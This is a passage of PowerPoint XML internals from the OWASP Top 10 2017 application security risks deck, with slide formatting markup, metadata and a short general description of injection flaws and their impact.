          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3640950281"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence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100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Almost any source of data can be an injection vector, including users, parameters, external and internal web services, and all types of users. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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atin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, ORM queries. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of your application and data.</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4589646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11/11/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.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1.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2.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3.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4.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5.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6.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7.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8.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9.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xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.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4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="OWASP Top 10-2017 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FEFFFF"/>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036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3C752E"/>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TotalTime>
  <Words>11495</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1221</Paragraphs>
  <Slides>27</Slides>
  <Notes>25</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OpenSymbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wide Latin</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Release Candidate</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Foreword</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10  Application Security Risks – 2017 </vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Broken Authentication</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>Broken Access Control</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Using Components  with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Insufficient Logging &amp; Monitoring</vt:lpstr>
      <vt:lpstr>What’s Next for Developers</vt:lpstr>
      <vt:lpstr>What’s Next for Security Testing</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>What’s Next for Application Managers</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors</vt:lpstr>
      <vt:lpstr>Methodology and Data</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>OWASP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 10 - 2017</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Andrew van der Stock</cp:lastModifiedBy>
  <cp:revision>1714</cp:revision>
  <cp:lastPrinted>2017-10-20T01:34:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-22T01:06:03Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>